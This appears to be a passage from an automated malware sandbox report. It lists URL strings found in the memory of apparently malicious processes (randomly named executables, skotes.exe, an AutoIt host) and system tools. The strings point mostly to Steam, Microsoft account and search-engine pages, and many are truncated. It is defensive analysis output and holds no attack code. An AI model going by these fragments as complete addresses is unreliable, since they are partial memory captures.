Source: svchost.exe, 0000000D.00000003.3478045345.0000028779986000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4522669332.0000028779937000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4522775338.000002877995F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.3465050245.0000028779982000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: svchost.exe, 0000000D.00000003.3480434356.0000028779988000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scC
Source: svchost.exe, 0000000D.00000002.4522669332.0000028779937000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scg
Source: svchost.exe, 0000000D.00000002.4522669332.0000028779937000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scnce
Source: svchost.exe, 0000000D.00000002.4522775338.000002877995F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scst
Source: svchost.exe, 0000000D.00000002.4522775338.000002877995F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4522451485.0000028779913000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: svchost.exe, 0000000D.00000002.4523655117.000002877A010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2888366873.000002877996D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2912345751.000002877A047000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.3457046694.000002877996E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: svchost.exe, 0000000D.00000003.2888366873.000002877996D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4525190291.000002877A081000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: svchost.exe, 0000000D.00000003.2888366873.000002877996D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue0
Source: svchost.exe, 0000000D.00000002.4522850990.000002877996F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2888366873.000002877996D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.3457046694.000002877996E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.3504621249.000002877996E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: svchost.exe, 0000000D.00000002.4522669332.0000028779937000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trustce
Source: regsvr32.exe, 00000022.00000002.4522281030.0000000002571000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000023.00000002.3067255526.0000023280228000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: 1639401074.exe, 0000001C.00000003.2918063924.00000000014C2000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2918096378.000000000142D000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917801991.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: 1639401074.exe, 0000001C.00000003.2918063924.00000000014C2000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2918096378.000000000142D000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917801991.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: 1639401074.exe, 0000001C.00000003.2918063924.00000000014C2000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2918096378.000000000142D000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917801991.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: powershell.exe, 00000023.00000002.3067255526.0000023280228000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Avoiding.com, 0000001A.00000002.4517122641.0000000000E75000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: skotes.exe, 00000007.00000002.4516129334.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000007.00000002.4516129334.00000000008A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: 21aaa725bd.exe, 0000001D.00000003.2918798818.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, 21aaa725bd.exe, 0000001D.00000003.2917993655.0000000002360000.00000004.00001000.00020000.00000000.sdmp, 21aaa725bd.tmp, 0000001E.00000000.2921026227.0000000000401000.00000020.00000001.01000000.00000015.sdmp	String found in binary or memory: http://www.innosetup.com/
Source: powershell.exe, 00000023.00000002.3181490458.00000232F02DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
Source: powershell.exe, 00000023.00000002.3183920931.00000232F03AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.
Source: 21aaa725bd.exe, 0000001D.00000003.2918798818.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, 21aaa725bd.exe, 0000001D.00000003.2917993655.0000000002360000.00000004.00001000.00020000.00000000.sdmp, 21aaa725bd.tmp, 0000001E.00000000.2921026227.0000000000401000.00000020.00000001.01000000.00000015.sdmp	String found in binary or memory: http://www.remobjects.com/ps
Source: 1639401074.exe, 0000001C.00000003.2917801991.00000000014C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: svchost.exe, 0000000D.00000002.4523655117.000002877A000000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.w3.o
Source: DbCMTMgeJo.exe, 00000000.00000003.2104892030.0000000005DE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: DbCMTMgeJo.exe, 00000000.00000003.2104892030.0000000005DE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: DbCMTMgeJo.exe, 00000000.00000003.2075049522.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp, DbCMTMgeJo.exe, 00000000.00000003.2075267820.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp, DbCMTMgeJo.exe, 00000000.00000003.2074800983.0000000005DD0000.00000004.00000800.00020000.00000000.sdmp, Avoiding.com, 0000001A.00000002.4526202507.0000000004641000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000022.00000003.3815074409.000000001C1A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: svchost.exe, 0000000D.00000003.2771033106.0000028779963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771007330.0000028779940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770957796.000002877993B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502
Source: svchost.exe, 0000000D.00000002.4519500542.000002877902B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502ssuer
Source: svchost.exe, 0000000D.00000002.4519812765.000002877905F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770690266.0000028779929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770814158.0000028779952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771033106.0000028779963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771007330.0000028779940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771190120.0000028779956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770957796.000002877993B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770690266.000002877992C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/Wizard/Password/Change?id=80601
Source: svchost.exe, 0000000D.00000003.2770690266.0000028779929000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
Source: svchost.exe, 0000000D.00000003.2770690266.0000028779929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770814158.0000028779952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771190120.0000028779956000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
Source: svchost.exe, 0000000D.00000003.2770690266.0000028779929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770814158.0000028779952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771190120.0000028779956000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
Source: svchost.exe, 0000000D.00000003.2770690266.0000028779929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770814158.0000028779952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771190120.0000028779956000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
Source: svchost.exe, 0000000D.00000003.2770690266.0000028779929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770814158.0000028779952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771190120.0000028779956000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
Source: svchost.exe, 0000000D.00000003.2771033106.0000028779963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771007330.0000028779940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770957796.000002877993B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4519500542.000002877902B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
Source: svchost.exe, 0000000D.00000003.2771033106.0000028779963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771007330.0000028779940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770957796.000002877993B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4519500542.000002877902B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
Source: svchost.exe, 0000000D.00000002.4519812765.000002877905F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771033106.0000028779963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771007330.0000028779940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770957796.000002877993B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
Source: svchost.exe, 0000000D.00000002.4519812765.000002877905F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771033106.0000028779963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
Source: svchost.exe, 0000000D.00000002.4519812765.000002877905F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771033106.0000028779963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
Source: svchost.exe, 0000000D.00000003.2770690266.0000028779929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770814158.0000028779952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2771007330.0000028779940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770984937.0000028779957000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2770957796.000002877993B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/msangcwam
Source: svchost.exe, 0000000D.00000002.4519688240.0000028779047000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/msangcwamvice
Source: powershell.exe, 00000023.00000002.3067255526.0000023280228000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: 1639401074.exe, 0000001C.00000002.2946265286.00000000014BF000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2918096378.000000000142D000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917801991.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: DbCMTMgeJo.exe, 00000000.00000003.2106302389.0000000005DAA000.00000004.00000800.00020000.00000000.sdmp, Avoiding.com, 0000001A.00000002.4526202507.0000000004731000.00000004.00000800.00020000.00000000.sdmp, Avoiding.com, 0000001A.00000002.4520728051.00000000016EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: DbCMTMgeJo.exe, 00000000.00000003.2106302389.0000000005DAA000.00000004.00000800.00020000.00000000.sdmp, Avoiding.com, 0000001A.00000002.4526202507.0000000004731000.00000004.00000800.00020000.00000000.sdmp, Avoiding.com, 0000001A.00000002.4520728051.00000000016EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: DbCMTMgeJo.exe, 00000000.00000003.2075049522.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp, DbCMTMgeJo.exe, 00000000.00000003.2075267820.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp, DbCMTMgeJo.exe, 00000000.00000003.2074800983.0000000005DD0000.00000004.00000800.00020000.00000000.sdmp, Avoiding.com, 0000001A.00000002.4526202507.0000000004641000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000022.00000003.3815074409.000000001C1A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
Source: DbCMTMgeJo.exe, 00000000.00000003.2075049522.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp, DbCMTMgeJo.exe, 00000000.00000003.2075267820.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp, DbCMTMgeJo.exe, 00000000.00000003.2074800983.0000000005DD0000.00000004.00000800.00020000.00000000.sdmp, Avoiding.com, 0000001A.00000002.4526202507.0000000004641000.00000004.00000800.00020000.00000000.sdmp, Avoiding.com, 0000001A.00000002.4530729249.0000000006574000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000022.00000002.4525258336.0000000012643000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000022.00000003.3815074409.000000001C1A1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000022.00000002.4525258336.0000000012613000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: DbCMTMgeJo.exe, 00000000.00000003.2075049522.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp, DbCMTMgeJo.exe, 00000000.00000003.2075267820.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp, DbCMTMgeJo.exe, 00000000.00000003.2074800983.0000000005DD0000.00000004.00000800.00020000.00000000.sdmp, Avoiding.com, 0000001A.00000002.4526202507.0000000004641000.00000004.00000800.00020000.00000000.sdmp, Avoiding.com, 0000001A.00000002.4530729249.0000000006574000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000022.00000002.4525258336.0000000012643000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000022.00000003.3815074409.000000001C1A1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000022.00000002.4525258336.0000000012613000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: 1639401074.exe, 0000001C.00000002.2946374900.00000000014C4000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2918063924.00000000014C2000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fa
Source: 1639401074.exe, 0000001C.00000002.2946265286.00000000014BF000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steams
Source: 1639401074.exe, 0000001C.00000002.2946374900.00000000014C4000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2918063924.00000000014C2000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamst
Source: 1639401074.exe, 0000001C.00000002.2946374900.00000000014C4000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2918063924.00000000014C2000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstat
Source: 1639401074.exe, 0000001C.00000003.2918063924.00000000014C2000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstati
Source: 1639401074.exe, 0000001C.00000002.2946374900.00000000014C4000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2918063924.00000000014C2000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.0
Source: 1639401074.exe, 0000001C.00000002.2946374900.00000000014C4000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2918063924.00000000014C2000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.c
Source: 1639401074.exe, 0000001C.00000002.2946374900.00000000014C4000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2918063924.00000000014C2000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.co
Source: 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/
Source: 1639401074.exe, 0000001C.00000003.2917801991.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000002.2931698311.000000000142A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=eVGzFA1_2smb&a
Source: 1639401074.exe, 0000001C.00000003.2918063924.00000000014C2000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917801991.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
Source: 1639401074.exe, 0000001C.00000003.2918063924.00000000014C2000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917801991.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
Source: 1639401074.exe, 0000001C.00000003.2918063924.00000000014C2000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917801991.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
Source: 1639401074.exe, 0000001C.00000002.2946265286.00000000014BF000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2918096378.000000000142D000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917801991.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: 1639401074.exe, 0000001C.00000003.2918063924.00000000014C2000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2918096378.000000000142D000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917801991.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: 1639401074.exe, 0000001C.00000002.2946374900.00000000014C4000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2918063924.00000000014C2000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/jav
Source: 1639401074.exe, 0000001C.00000002.2946265286.00000000014BF000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/appl
Source: 1639401074.exe, 0000001C.00000002.2946265286.00000000014BF000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917801991.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000002.2931698311.000000000142A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: 1639401074.exe, 0000001C.00000002.2946265286.00000000014BF000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917801991.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000002.2931698311.000000000142A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=S_dh0_Jk
Source: 1639401074.exe, 0000001C.00000003.2917801991.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000002.2931698311.000000000142A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=bHp0
Source: 1639401074.exe, 0000001C.00000003.2918063924.00000000014C2000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917801991.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
Source: 1639401074.exe, 0000001C.00000003.2918063924.00000000014C2000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917801991.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
Source: 1639401074.exe, 0000001C.00000002.2946374900.00000000014C4000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2918063924.00000000014C2000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917801991.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
Source: 1639401074.exe, 0000001C.00000002.2946374900.00000000014C4000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2918063924.00000000014C2000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917801991.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
Source: 1639401074.exe, 0000001C.00000002.2946374900.00000000014C4000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2918063924.00000000014C2000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917801991.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
Source: 1639401074.exe, 0000001C.00000003.2917801991.00000000014C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
Source: 1639401074.exe, 0000001C.00000002.2946374900.00000000014C4000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2918063924.00000000014C2000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917801991.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
Source: 1639401074.exe, 0000001C.00000003.2918063924.00000000014C2000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917801991.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, 1639401074.exe, 0000001C.00000003.2917946098.00000000014BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
